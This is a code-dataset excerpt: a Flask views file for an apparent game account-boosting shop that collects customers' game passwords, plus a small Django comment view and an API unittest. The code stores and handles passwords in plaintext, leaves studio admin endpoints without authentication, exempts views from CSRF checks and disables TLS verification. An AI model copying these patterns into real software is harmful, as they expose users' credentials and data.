render_template('front/gl.html', userid=user.id, score=user.score)\n\n def post(self):\n return json.dumps({'status': 400, 'message': '小店数据库已经迁移升级,请登录:www.wumu.pro 提交订单'})\n\n # 判断token是否存在,防止订单重复提交\n if config.TOKEN not in session:\n return '当前页面已失效,请刷新重试'\n del session[config.TOKEN]\n\n form = request.form\n consume_score = int(form.get('consume_score'))\n buser = form.get('buser').strip()\n bpsw = form.get('bpsw').strip()\n dive = form.get('dive')\n eat = form.get('eat')\n type = form.get('type')\n num = form.get('num')\n id = str(random.randint(1000000000, 10000000000))\n data = {\n 'type': type,\n 'buser': buser,\n 'bpsw': bpsw,\n 'num': num,\n 'dive': dive,\n 'eat': eat,\n 'id': id,\n }\n\n dd = DD(buser=buser, type=type, num=num, id=id, user_table_id=g.user.table_id, bpsw=bpsw, dive=dive, eat=eat, consume_score=consume_score)\n\n # 判断该用户是否是月卡用户,是则用月卡对应的原站账号提交订单信息\n # 如果是月卡用户,且提交的订单游戏账号为绑定的账号,则无需判断积分是否够,直接提交\n # 如果是月卡用户,且提交的订单游戏账号不为绑定的账号,则判断积分时候足够,不够则返回前端,积分不够\n # 如果用原站对应账号提交,积分够,则用原站对应的账号提交,不够还是用默认提交订单的方法提交\n # 如���不是月卡用户,则用默认提交订单数据的方法提交\n\n # 测试结果 #\n # 存在任务: 该账号已存在任务尚未完成\n # 绑定的账号提交结果: success
    扣除积分:0 当前剩余积分:199
    当前账号为绑定账号不消耗积分\n # 未绑定的账号提交结果: success
    扣除积分:1 当前剩余积分:198\n # 积分不足:积分不足,当前剩余178,本次需要185\n\n member = db.session.query(Member).filter(Member.user_id==g.user.id).first()\n if member and member.is_not_expire(): # 是月卡用户\n # 如果提交的账号为绑定的游戏账号\n if buser in [member.buser1, member.buser2]:\n result = mspider.msspider.commit_dd(member.ruser, dd)\n dd.consume_score = 0 # 绑定账号订单消耗积分为0分\n else: # 游戏账号未绑定\n\n # 则需要判断用户积分是否够打这一订单\n if g.user.score >= consume_score:\n result = mspider.msspider.commit_dd(member.ruser, dd)\n if result[:4] == '积分不足':\n result = request_spider(data)\n else:\n return json.dumps({'status': 400, 'message': '积分不足'})\n\n else: # 普通用户:默认提交方式\n # 先判断积分是否够提交该订单\n if g.user.score < consume_score:\n return json.dumps({'status': 400, 'message': '积分不足'})\n \n result = request_spider(data)\n print(result)\n # 判断是否提交成功\n if result[:7] == 'success':\n dd.intype = '等待执行'\n else:\n dd.intype = '等待提交'\n\n g.user.score -= dd.consume_score\n\n # 将消费信息保存到文件中\n consume_score_log(g.user.table_id, g.user.name, id, g.user.score, dd.consume_score)\n\n # 将订单存到数据库表中\n db.session.add(dd)\n db.session.commit()\n return json.dumps({'status': 200, 'message': 'success',\n 'data': {\n 'consume_score': dd.consume_score,\n 'score': g.user.score\n }})\n\n\nimport re\n\n\n@bp.route('/sc_select_items/', methods=['POST'])\n@login_required\ndef sc_select_items():\n parent = request.form.get('type')\n items = db.session.query(SSC).filter(SSC.parent==parent).all()\n items_dict = [item.to_dict() for item in items]\n if parent == '0':\n for item in items_dict: # 增加基础分字段\n pattern = r'.*?(\\d+).*?'\n base_score = re.search(pattern, item['name']).group(1)\n item['base_score'] = base_score\n return json.dumps(items_dict)\n\n\nclass JqView(views.MethodView):\n decorators = [login_required]\n def get(self):\n session[config.TOKEN] = config.TOKEN\n return render_template('front/jq.html')\n\n def post(self):\n return json.dumps({'status': 400, 'message': '小店数据库已经迁移升级,请登录:www.wumu.pro 提交订单'})\n\n # 判断token是否存在,防止订单重复提交\n if config.TOKEN not in session:\n return '当前页面已失效,请刷新重试'\n del session[config.TOKEN]\n\n form = request.form\n buser = form.get('buser').strip()\n bpsw = form.get('bpsw').strip()\n dive = form.get('dive')\n eat = form.get('eat')\n type = form.get('type')\n consume_score = int(form.get('consume_score'))\n misstype = form.get('misstype')\n id = str(random.randint(1000000000, 10000000000))\n data = {\n 'type': type,\n 'buser': buser,\n 'bpsw': bpsw,\n 'dive': dive,\n 'eat': eat,\n 'id': id,\n 'misstype': misstype\n }\n dd = DD(buser=buser, type=type, misstype=misstype, id=id, user_table_id=g.user.table_id, bpsw=bpsw, dive=dive, eat=eat, consume_score=consume_score)\n\n member = db.session.query(Member).filter(Member.user_id == g.user.id).first()\n if member and member.is_not_expire(): # 是月卡用户\n # 如果提交的账号为绑定的游戏账号\n if buser in [member.buser1, member.buser2]:\n result = mspider.msspider.commit_dd(member.ruser, dd)\n dd.consume_score = 0 # 绑定账号订单消耗积分为0分\n else: # 游戏账号未绑定\n\n # 则需要判断用户积分是否够打这一订单\n if g.user.score >= consume_score:\n # 可能存在积分不够的情况\n result = mspider.msspider.commit_dd(member.ruser, dd)\n if result[:4] == '积分不足':\n result = request_spider(data)\n else:\n return json.dumps({'status': 400, 'message': '积分不���'})\n\n else: # 普通用户:默认提交方式\n # 先判断积分是否够提交该订单\n if g.user.score < consume_score:\n return json.dumps({'status': 400, 'message': '积分不足'})\n\n result = request_spider(data)\n # 判断是否提交成功\n if result[:7] == 'success':\n dd.intype = '等待执行'\n else:\n dd.intype = '等待提交'\n\n # 将消费信息保存到文件中\n consume_score_log(g.user.table_id, g.user.name, id, g.user.score, consume_score)\n\n g.user.score -= dd.consume_score\n if g.user.score < 0:\n return json.dumps({'status': 400, 'message': '积分不足'})\n\n # 将订单存到数据库表中\n db.session.add(dd)\n db.session.commit()\n return json.dumps({'status': 200, 'message': 'success',\n 'data': {\n 'consume_score': dd.consume_score,\n 'score': g.user.score\n }})\n\n\nclass ScView(views.MethodView):\n decorators = [login_required]\n def get(self):\n session[config.TOKEN] = config.TOKEN\n return render_template('front/sc.html')\n\n def post(self):\n return json.dumps({'status': 400, 'message': '小店数据库已经迁移升级,请登录:www.wumu.pro 提交订单'})\n\n # 判断token是否存在,防止订单重复提交\n if config.TOKEN not in session:\n return '当前页面已失效,请刷新重试'\n del session[config.TOKEN]\n\n form = request.form\n buser = form.get('buser').strip()\n type = form.get('type')\n consume_score = int(form.get('consume_score'))\n bpsw = form.get('bpsw').strip()\n dive = form.get('dive')\n eat = form.get('eat')\n misstype = form.get('misstype')\n num = form.get('num')\n id = str(random.randint(1000000000, 10000000000))\n\n data = {\n 'type': type,\n 'buser': buser,\n 'bpsw': bpsw,\n 'dive': dive,\n 'eat': eat,\n 'id': id,\n 'num': num,\n 'misstype': misstype,\n }\n dd = DD(buser=buser, type=type, misstype=misstype, id=id, user_table_id=g.user.table_id, bpsw=bpsw, dive=dive,\n eat=eat, consume_score=consume_score, num=num)\n\n member = db.session.query(Member).filter(Member.user_id == g.user.id).first()\n if member and member.is_not_expire(): # 是月卡用户\n # 如果提交的账号为绑定的游戏账号\n if buser in [member.buser1, member.buser2]:\n result = mspider.msspider.commit_dd(member.ruser, dd)\n dd.consume_score = 0 # 绑定账号订单消耗积分为0分\n else: # 游戏账号未绑定\n\n # 则需要判断用户积分是否够打这一订单\n if g.user.score >= consume_score:\n # 可能存在积分不够的情况\n result = mspider.msspider.commit_dd(member.ruser, dd)\n if result[:4] == '积分不足':\n result = request_spider(data)\n else:\n return json.dumps({'status': 400, 'message': '积分不足'})\n\n else: # 普通用户:默认提交方式\n # 先判断积分是否够提交该订单\n if g.user.score < consume_score:\n return json.dumps({'status': 400, 'message': '积分不足'})\n\n result = request_spider(data)\n print(result)\n # 判断是否提交成功\n if result[:7] == 'success':\n dd.intype = '等待执行'\n else:\n dd.intype = '等待提交'\n\n # 将消费信息保存到文件中\n consume_score_log(g.user.table_id, g.user.name, id, g.user.score, consume_score)\n\n g.user.score -= dd.consume_score\n if g.user.score < 0:\n return json.dumps({'status': 400, 'message': '积分不足'})\n\n # 将订单存到数据库表中\n db.session.add(dd)\n db.session.commit()\n return json.dumps({'status': 200, 'message': 'success',\n 'data': {\n 'consume_score': dd.consume_score,\n 'score': g.user.score\n }})\n\n\nbp.add_url_rule('/sc/', view_func=ScView.as_view('sc'))\n\n\nclass AcdView(views.MethodView):\n decorators = [login_required]\n def get(self):\n session[config.TOKEN] = config.TOKEN\n return render_template('front/acd.html')\n\n def post(self):\n return json.dumps({'status': 400, 'message': '小店数据库已经迁移升级,请登录:www.wumu.pro 提交订单'})\n\n # 判断token是否存在,防止订单重复提交\n if config.TOKEN not in session:\n return '当前页面已失效,请刷新重试'\n del session[config.TOKEN]\n\n form = request.form\n buser = form.get('buser').strip()\n type = form.get('type')\n consume_score = int(form.get('consume_score'))\n bpsw = form.get('bpsw').strip()\n dive = form.get('dive')\n eat = form.get('eat')\n misstype = form.get('misstype')\n num = int(form.get('num'))\n id = str(random.randint(1000000000, 10000000000))\n\n data = {\n 'type': form.get('type'),\n 'buser': form.get('buser'),\n 'bpsw': bpsw,\n 'dive': dive,\n 'eat': eat,\n 'id': id,\n 'num': num,\n 'misstype': misstype,\n }\n dd = DD(buser=buser, type=type, misstype=misstype, id=id, user_table_id=g.user.table_id, bpsw=bpsw, dive=dive,\n eat=eat, consume_score=consume_score, num=num)\n\n member = db.session.query(Member).filter(Member.user_id == g.user.id).first()\n if member and member.is_not_expire(): # 是月卡用户\n # 如果提交的账号为绑定的游戏账号\n if buser in [member.buser1, member.buser2]:\n result = mspider.msspider.commit_dd(member.ruser, dd)\n dd.consume_score = 0 # 绑定账号订单消耗积分为0分\n else: # 游戏账号未绑定\n\n # 则需要判断用户积分是否够打这一订单\n if g.user.score >= consume_score:\n # 可能存在积分不够的情况\n result = mspider.msspider.commit_dd(member.ruser, dd)\n if result[:4] == '积分不足':\n result = request_spider(data)\n else:\n return json.dumps({'status': 400, 'message': '积分不足'})\n\n else: # 普通用户:默认提交方式\n # 先判断积分是否够提交该订单\n if g.user.score < consume_score:\n return json.dumps({'status': 400, 'message': '积分不足'})\n result = request_spider(data)\n print(result)\n # 判断是否提交成功\n if result[:7] == 'success':\n dd.intype = '等待执行'\n else:\n dd.intype = '等待提交'\n\n # 将消费信息保存到文件中\n consume_score_log(g.user.table_id, g.user.name, id, g.user.score, consume_score)\n\n g.user.score -= dd.consume_score\n if g.user.score < 0:\n return json.dumps({'status': 400, 'message': '积分不足'})\n\n # 将订单存到数据库表中\n db.session.add(dd)\n db.session.commit()\n return json.dumps({'status': 200, 'message': 'success',\n 'data': {\n 'consume_score': dd.consume_score,\n 'score': g.user.score\n }})\n\n\nbp.add_url_rule('/acd/', view_func=AcdView.as_view('acd'))\n\n\n@bp.route('/dd/')\n@login_required\ndef page5():\n return render_template('front/dd.html', userid=g.user.id)\n\n\n@bp.route('/info/')\n@login_required\ndef page6():\n db.session.commit()\n return render_template('front/info.html', name=g.user.name, score=g.user.score, user_id=g.user.id)\n\n\n@bp.route('/acd_datas/', methods=['POST'])\n@login_required\ndef acd_datas():\n acds = db.session.query(ACD).all()\n acds = [acd.to_dict() for acd in acds]\n return json.dumps(acds)\n\n\n@bp.route('/wwc_dd/', methods=['POST'])\n@login_required\ndef wwc_dds():\n db.session.commit()\n user = db.session.query(User).filter(User.id==g.user.id).first()\n if user:\n # 拿到用户的所有订单id,向原站发请求更新一遍订单\n # dds = user.dds\n # ids = list(map(lambda data: data.id, dds))\n # user_update_dd(ids)\n\n # 跟新会员订单\n # member = db.session.query(Member).filter(Member.user_id==user.id).first()\n # if member:\n # mspider.msspider.user_update_dd(ids, member.ruser)\n\n wwcs = user.dds # 该用户所有的订单\n # 拿出所有未完成的订单\n wwcs = list(filter(lambda dd: not dd.is_completed and not dd.is_deleted, wwcs))\n wwcs = list(filter(lambda dd: dd.intype!='complete', wwcs))\n wwcs = [wwc.to_dict() for wwc in wwcs]\n return json.dumps(wwcs)\n else:\n return ''\n\n\n@bp.route('/ywc_dd/', methods=['POST'])\n@login_required\ndef ywc_dds():\n db.session.commit()\n user = db.session.query(User).filter(User.id==g.user.id).first()\n ywcs = user.dds # 该用户所有的订单\n # 拿出所有已完成的订单\n ywcs = list(filter(lambda dd: dd.is_completed == True, ywcs))\n ywcs = [ywc.to_dict() for ywc in ywcs]\n return json.dumps(ywcs)\n\n\n@bp.route('/dd_fields/', methods=['POST'])\n@login_required\ndef dd_fields():\n id = request.form.get('id')\n dd = db.session.query(DD).filter(DD.id==id).first()\n return json.dumps(dd.to_dict())\n\n\n@bp.route('/clear_ywc_dd/')\n@login_required\ndef clear_dd():\n '''清除��完成订单'''\n user = db.session.query(User).filter(User.id==g.user.id).first()\n dds = db.session.query(DD).filter(DD.is_completed==True, DD.user_table_id==user.table_id).all()\n for dd in dds:\n db.session.delete(dd)\n db.session.commit()\n return 'success'\n\n\nclass LoginView(views.MethodView):\n def get(self):\n return render_template('front/login.html')\n\n def post(self):\n form = request.form\n name = form.get('username')\n password = form.get('password')\n try:\n user = db.session.query(User).filter(User.name==name).first()\n if user and user.check_password(password):\n session['id'] = user.id\n return redirect(url_for('front_bp.index'))\n except Exception as err:\n db.session.rollback()\n return render_template('front/login.html', error=\"登陆信息有误,请重试\")\n\n\nbp.add_url_rule('/login/', view_func=LoginView.as_view('login'))\n\n\n@bp.route('/captcha/')\ndef captcha():\n text, image = Captcha.gene_graph_captcha()\n out = BytesIO()\n image.save(out, 'png')\n out.seek(0)\n resp = make_response(out.read())\n resp.content_type = 'image/png'\n global g_captcha\n g_captcha = text.lower()\n return resp\n\n\nclass RegisterView(views.MethodView):\n def get(self):\n return render_template(\"front/register.html\")\n\n def post(self):\n form = request.form\n name = form.get('name')\n password = form.get('password')\n repassword = form.get('repassword')\n # captcha = form.get('captcha').lower()\n resp = {\n \"code\": 200,\n \"message\": \"\",\n \"data\": {\n }\n }\n # 判断用户名是否存在\n user = db.session.query(User).filter(User.name==name).first()\n global g_captcha\n # if captcha != g_captcha:\n # resp['message'] = 'captcha error'\n if user:\n resp['message'] = 'name exists'\n elif password != repassword:\n resp['message'] = 'password not equal'\n else:\n user = User(id=str(uuid()), name=name, password=password, score=0)\n try:\n db.session.add(user)\n db.session.commit()\n resp['message'] = 'success'\n except Exception as err:\n print(err)\n db.session.rollback()\n resp['message'] = 'fail'\n return json.dumps(resp)\n\n\nbp.add_url_rule('/register/', view_func=RegisterView.as_view('register'))\nbp.add_url_rule('/gl/', view_func=GlView.as_view('gl'))\nbp.add_url_rule('/jq/', view_func=JqView.as_view('jq'))\n\n\nfrom datetime import datetime\nfrom csv import writer\n\n\ndef recharge_record_to_file(card_id, user_name, score, score_r, score_h, datetime):\n '''将充值记录保存到records.csv文件中'''\n with open('records.csv', 'a', encoding='utf-8', newline='') as af:\n wf = writer(af)\n wf.writerow([card_id, user_name, datetime, score, score_r, score_h])\n\n\n@bp.route('/charge/')\n@login_required\ndef charge():\n form = request.args\n resp = {\n 'status': 200,\n 'message': '',\n 'data': '',\n }\n card_id = form.get('card_id').strip()\n\n user = db.session.query(User).filter(User.id==g.user.id).first()\n card = db.session.query(PointCard).filter(PointCard.id==card_id).first()\n mmcard = db.session.query(MMCard).filter(MMCard.cnumber==card_id).first()\n\n if card and card.is_delete==False: # 如果卡存在,则充值\n score_r = user.score # 客户充值前的积分\n score = int(card.card.replace('test', '').replace('p',''))\n try:\n # 提交充值结果\n user.score += score\n card.is_delete = True\n db.session.commit()\n except Exception as err:\n db.session.rollback()\n resp['message'] = '充值失败'\n\n # 判断时候充值成功\n # 充值后的积分 - 充值前的积分 == 卡的积分, 判断时候充值成功\n if user.score - score_r == score:\n recharge_record_to_file(card_id=card_id, \\\n user_name=user.name, \\\n score=score, \\\n score_r = score_r, \\\n score_h = user.score, \\\n datetime=datetime.now())\n resp['message'] = '充值成功'\n else:\n resp['message'] = '充值失败'\n resp['status'] = 400\n\n # 月卡逻辑代码\n elif mmcard and mmcard.is_use == False:\n # 先把本站月卡设为已使用,避免重复提交\n mmcard.is_use = True\n db.session.commit()\n try:\n # 先查找数据库中是否存在该用户对应的会员\n member = db.session.query(Member).filter(Member.user_id==user.id).first()\n\n # 从数据库中���出一张原站对应的月卡\n rmcard = db.session.query(RMCard).filter(RMCard.is_use==False).first()\n\n # 如果不存在,则创建对应的会员实体\n if not member:\n ruser = mspider.msspider.register()\n if ruser is None: # 注册失败\n return json.dumps({'status': 400, 'message': '激活失败,请重试!'})\n\n # 为激活用户创建一个会员实体\n member = Member(\n user_id=user.id,\n ruser=ruser\n )\n member.create_time = datetime.now()\n member.add_time(0)\n db.session.add(member)\n db.session.commit()\n\n # 将充值请求发到原站\n result = mspider.msspider.recharge_mcard(ruser, rmcard.cnumber)\n # 如果月卡充值成功,原站月卡才设为已使用过\n if result == 'success':\n rmcard.is_use = True # 原站月卡设为已使用\n member.add_time(31) # 会员账号延长31天\n user.score += 200 # 激活成功添加200分\n db.session.commit()\n resp['message'] = '月卡激活成功'\n else:\n resp['message'] = result\n\n # 如果数据库中存在会员记录\n # 会员没到期\n elif member and member.is_not_expire():\n # 将充值请求发到原站\n result = mspider.msspider.recharge_mcard(member.ruser, rmcard.cnumber)\n if result == 'success':\n rmcard.is_use = True\n user.score += 200\n member.add_time(31)\n db.session.commit()\n resp['message'] = '月卡激活成功'\n else:\n resp['message'] = result\n\n # 会员到期了,则把当前时间设为开通会员的时间,然后在加31天有效期\n else:\n # 将充值请求发到原站\n result = mspider.msspider.recharge_mcard(member.ruser, rmcard.cnumber)\n if result == 'success':\n rmcard.is_use = True\n member.create_time = datetime.now()\n member.add_time(31)\n user.score += 200\n db.session.commit()\n\n resp['message'] = '月卡激活成功'\n else:\n resp['message'] = result\n except Exception as err:\n resp['status'] = 400\n resp['message'] = '激活发生了异常,重试就好了'\n else:\n resp['status'] = 400\n resp['message'] = '卡号不存在或已使用过,请找相关人员补发'\n return json.dumps(resp)\n\n\n@bp.route('/search/')\n@login_required\ndef search():\n card_id = request.args.get('card_id').strip()\n card = db.session.query(PointCard).filter(PointCard.id==card_id).first()\n mcard = db.session.query(MMCard).filter(MMCard.cnumber==card_id).first()\n resp = {\n 'code': 200,\n 'message': '',\n 'data': '',\n }\n\n # 如果是积分卡\n if card and card.is_delete == False:\n score = int(card.card.replace('test', '').replace('p', ''))\n resp['message'] = \"你可以使用此卡\\n类型:积分卡\\n积分为\" + str(score)\n elif mcard and mcard.is_use == False:\n resp['message'] = \"你可以使用此卡\\n类型:月卡\\n时常:31天\\n获得积分200分\"\n else:\n resp['message'] = '卡号不存在'\n return json.dumps(resp)\n\n\n@bp.route('/logout/')\ndef logout():\n try:\n del session['id']\n except Exception as err:\n flask.abort(500)\n print(err)\n return redirect(url_for('front_bp.login'))\n\n\n@bp.route('/continue_dd/')\n@login_required\ndef continue_dd():\n dd_id = request.args.get('dd_id')\n dd = db.session.query(DD).filter(DD.id==dd_id).first()\n member = db.session.query(Member).filter(Member.user_id==g.user.id).first()\n\n # 1. 如果订单状态为等待提交,用户点击继续订单,尝试把订单往原站提交\n # 2. 如果订单状态不为等待提交,用户点击继续订单,则向原站发送继续订单请求\n if dd:\n # 1\n if dd.intype == '等待提交':\n # 如果存在对应的会员账号,则尝试向用会员账号发请求\n if member:\n result = mspider.msspider.commit_dd(member.ruser, dd)\n if result[:7] == 'success':\n dd.intype = '等待执行'\n db.session.commit()\n return 'success'\n\n # 向原站发送请求,提交订单\n result = reuqest_dd_spider(dd)\n if result[:7] == 'success':\n dd.intype = '等待执行'\n db.session.commit()\n return 'success'\n\n # 以上都没成功则返回\n return '存在未完成的订单'\n\n else:\n if member: # 如果该用户存在对应的原站账号,则也尝试提交\n result = mspider.msspider.continue_dd(member.ruser, dd_id)\n if result[:7] == 'success':\n dd.intype = '等待执行'\n db.session.commit()\n return 'success'\n\n result = spider_continue_dd(dd_id)\n if result[:7] == 'success':\n dd.intype = '等待执行'\n db.session.commit()\n return 'success'\n else:\n return result\n else:\n return '订单不存在'\n\n\n@bp.route('/delete_dd/')\n@login_required\ndef delete_id():\n dd_id = request.args.get('dd_id')\n dd = db.session.query(DD).filter(DD.id == dd_id).first()\n # 如果订单存在且状态为“等待提交”,则删除订单退回积分\n if dd:\n if dd.intype == '等待提交':\n user = db.session.query(User).filter(User.table_id == dd.user_table_id).first()\n user.score += dd.consume_score\n db.session.delete(dd)\n db.session.commit()\n return 'success score'\n\n # 否则向原站发送删除订单请求\n else:\n member = db.session.query(Member).filter(Member.user_id == g.user.id).first()\n if member:\n result = mspider.msspider.delete_dd(member.ruser, dd_id)\n if result=='success':\n return 'success'\n elif result[:5] == '等待执行中':\n return '等待执行中,无法删除'\n\n result = spider_delete_dd(dd_id)\n if result == 'success':\n return 'success'\n return result\n else:\n return '订单不存在'\n\n\n@bp.route('/help/')\ndef help():\n return render_template('front/help.html')\n\n\nclass EmailBindView(views.MethodView):\n decorators = [login_required]\n def get(self):\n return render_template('front/email_bind.html')\n\n def post(self):\n print(request.form)\n email = request.form.get('email')\n captcha = request.form.get('captcha')\n if captcha and captcha.strip() == mc.get(email):\n id = session.get('id')\n if id:\n user = db.session.query(User).filter(User.id==id).first()\n user.email = email\n db.session.commit()\n print('#'*30, user)\n return 'success'\n return '验证码不正确'\n\n\nbp.add_url_rule('/email_bind/', view_func=EmailBindView.as_view('email_bind'), endpoint='/email_bind/')\n\n\n@bp.route('/send_captcha/')\n@login_required\ndef send_captcha():\n email = request.args.get('email')\n captcha = random.randint(10000, 100000)\n mc.set(email, str(captcha))\n send_mail.delay('绑定邮箱验证码', [email], '技术小哥告诉你验证码是:'+str(captcha)+' 有效期10分钟')\n return 'success'\n\n\n@bp.route('/del_dd/')\n@login_required\ndef del_dd():\n id = request.args.get('id')\n dd = db.session.query(DD).filter(DD.id==id).first()\n if dd and dd.user_table_id==g.user.table_id:\n db.session.delete(dd)\n db.session.commit()\n return 'success'\n else:\n return '订单不存在'\n\n\n@bp.route('/identity/')\ndef identity():\n user_id = request.args.get('user_id')\n member = db.session.query(Member).filter(Member.user_id==user_id).first()\n if member and member.is_not_expire():\n return json.dumps({'status': 200, 'message': 'member', 'expire_time': str(member.expire_time)})\n else:\n return json.dumps({'status': 200, 'message': 'not member'})\n\n\n@bp.route('/QDIrsk9WjB.txt/')\ndef send_static_txt():\n return send_file('QDIrsk9WjB.txt')\n\n\nclass StudioDDView(views.MethodView):\n decorators = [studio_login_required]\n def get(self):\n studio_user = g.studio_user\n dds = db.session.query(StudioDD).filter(StudioDD.studio_user_id==studio_user.id).order_by(StudioDD.create_time.desc()).all()\n types = db.session.query(StudioDD.type).group_by(StudioDD.type).all()\n context = {\n 'dds': dds,\n 'types': types\n }\n return render_template('front/studio_dd.html', **context)\n\n\nclass StudioLoginView(views.MethodView):\n def get(self):\n return render_template('front/studio_login.html')\n\n def post(self):\n form = StudioLoginForm(request.form)\n if form.validate():\n username = form.username.data\n password = form.password.data\n\n studio_user = db.session.query(StudioUser).filter(\n StudioUser.username==username,\n StudioUser.password==password\n ).first()\n if studio_user:\n session['studio_user_id'] = studio_user.id\n return json.dumps({'status': 200, 'message': \"登陆成功!\", 'href': '/studio_dd/'})\n return json.dumps({'status': 404, 'message': \"账号不存在!\"})\n return json.dumps({'status': 400, 'message': form.get_error()})\n\n\nclass SetStudioDDIntypeView(views.MethodView):\n '''设置工作室订单的状态'''\n def post(self):\n ids = request.form.get('ids')\n intype = request.form.get('intype')\n\n for id in ids.split(','):\n studio_dd = db.session.query(StudioDD).filter(StudioDD.id==id).first()\n if studio_dd:\n studio_dd.intype = intype\n\n # 如果订单存在手机号,则发送短信通知\n if studio_dd.telephone:\n telephone = studio_dd.telephone\n\n # 根据不同的状态,发送不同的短信通知\n if intype == '已经开工':\n ali_sms.send_eat_start(telephone)\n elif intype == '账号信息有误':\n ali_sms.send_error(telephone)\n elif intype == '已经吃完苹果':\n ali_sms.send_eat_all_apple(telephone)\n elif intype == '订单已完成':\n ali_sms.send_complate2(telephone)\n else:\n pass\n\n db.session.commit()\n return json.dumps({'status': 200, 'message': \"设置成功!\"})\n\n\nclass DelDDView(views.MethodView):\n '''删除订单'''\n def post(self):\n ids = request.form.get('ids')\n intype = request.form.get('intype')\n\n for id in ids.split(','):\n studio_dd = db.session.query(StudioDD).filter(StudioDD.id==id).first()\n if studio_dd:\n db.session.delete(studio_dd)\n db.session.commit()\n return json.dumps({'status': 200, 'message': \"删除成功!\"})\n\n\nclass FilterStudioDDView(views.MethodView):\n '''筛选订单'''\n def post(self):\n intype = request.form.get('intype')\n type = request.form.get('type')\n\n if intype:\n if intype == '全部订单':\n studio_dds = db.session.query(StudioDD).filter(StudioDD.studio_user_id==g.studio_user.id)\\\n .order_by(StudioDD.create_time.desc()).all()\n else:\n studio_dds = db.session.query(StudioDD).filter(StudioDD.intype==intype, StudioDD.studio_user_id==g.studio_user.id)\\\n .order_by(StudioDD.create_time.desc()).all()\n elif type:\n studio_dds = db.session.query(StudioDD).filter(StudioDD.type.like('%' + type + '%'), StudioDD.studio_user_id==g.studio_user.id)\\\n .order_by(StudioDD.create_time.desc()).all()\n else:\n studio_dds = db.session.query(StudioDD).all()\n\n studio_dds_dic = list(map(lambda obj: obj.to_dict(), studio_dds))\n return json.dumps({'status': 200, 'message': \"返回的数据从data里拿!\", 'data': studio_dds_dic})\n\n\nclass EditorStudioDDView(views.MethodView):\n\n def post(self):\n dd_id = request.form.get('dd_id', type=int)\n buser = request.form.get('buser')\n bpsw = request.form.get('bpsw')\n\n studio_dd = db.session.query(StudioDD).filter(StudioDD.id==dd_id).first()\n if studio_dd:\n studio_dd.buser = buser\n studio_dd.bpsw = bpsw\n db.session.commit()\n return json.dumps({'status': 200, 'message': \"修改成功!\"})\n return json.dumps({'status': 404, 'message': \"订单不存在\"})\n\n\nfrom werkzeug.security import generate_password_hash, check_password_hash\n@bp.route('/check_password/')\ndef check_password():\n password = request.args.get('password', default='')\n pwhash = request.args.get('pwhash', default='')\n print(password)\n print(check_password_hash(pwhash=pwhash, password=password))\n return 'yes' if check_password_hash(pwhash=pwhash, password=password) else 'no'\n\n\nbp.add_url_rule('/studio_dd/', view_func=StudioDDView.as_view('studio_dd'), endpoint='studio_dd')\nbp.add_url_rule('/studio_login/', view_func=StudioLoginView.as_view('studio_login'), endpoint='studio_login')\nbp.add_url_rule('/set_studio_dd_intype/', view_func=SetStudioDDIntypeView.as_view('set_studio_dd_intype'))\nbp.add_url_rule('/del_studio_dd/', view_func=DelDDView.as_view('del_studio_dd'))\nbp.add_url_rule('/filter_dd/', view_func=FilterStudioDDView.as_view('filter_dd'))\nbp.add_url_rule('/editor_dd/', view_func=EditorStudioDDView.as_view('editor_dd'))\n\n","sub_path":"apps/front/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":37084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"645416124","text":"from django.shortcuts import render\nfrom django.utils import timezone\nfrom django.http import HttpResponse\n\nfrom lan2015.models import Announcement\nfrom lan2015.models import Comment\n\nfrom django.views.decorators.csrf import csrf_exempt\n\nimport json\n\n# Create your views here.\n\n\ndef index(request):\n return render(request, 'lan2015/login.html')\n\n\n@csrf_exempt\ndef main(request):\n announcements = Announcement.objects.order_by('pub_date');\n comments = Comment.objects.order_by('pub_date');\n context = {'announcements': announcements, 'comments': comments}\n return render(request, 'lan2015/stammlan-2015/index.html', context)\n\n\n@csrf_exempt\ndef sendComment(request):\n results = {}\n if request.method == 'POST':\n commentName = request.POST.get('commentName')\n commentText = request.POST.get('commentText')\n commentColor= request.POST.get('commentColor')\n\n c = Comment()\n c.userName = commentName\n c.text = commentText\n c.color= commentColor\n c.pub_date = timezone.now()\n\n c.save()\n results['commentName'] = c.userName\n results['commentText'] = c.text\n results['commentColor']= c.color\n results['commentDate'] = c.pub_date.strftime(\"%Y-%m-%d %H:%M\")\n\n j = json.dumps(results)\n return HttpResponse(j, content_type='application/json')\n","sub_path":"lan2015/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"417385989","text":"import requests\n\nfrom api.config.readconfig import ReadConfig\nimport unittest\n\nclass testsupportcenter(unittest.TestCase):\n def test_supportCenter(self):\n access_token=ReadConfig().get_value(\"params\",\"access_token\")\n ip = ReadConfig().get_value(\"url\",\"ip\")\n adi = \"v1.3/svocloud/support/room\"\n url = \"/\".join((ip , adi))\n header = {\"Content-Type\": \"application/json\",\n \"Authorization\": (\"Bearer\" + \" \" + access_token),\n \"token\": access_token ,\n \"terminalType\":\"mobile\"\n }\n\n#the ip is changed from v 1.2 to v1.3\n r = requests.get(url,headers=header,verify = False)\n print(r.text)\n self.assertEqual(200,r.status_code)\n\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"app_api/alltestcase/Double_check/test_SVOC_SupportCenter.py","file_name":"test_SVOC_SupportCenter.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}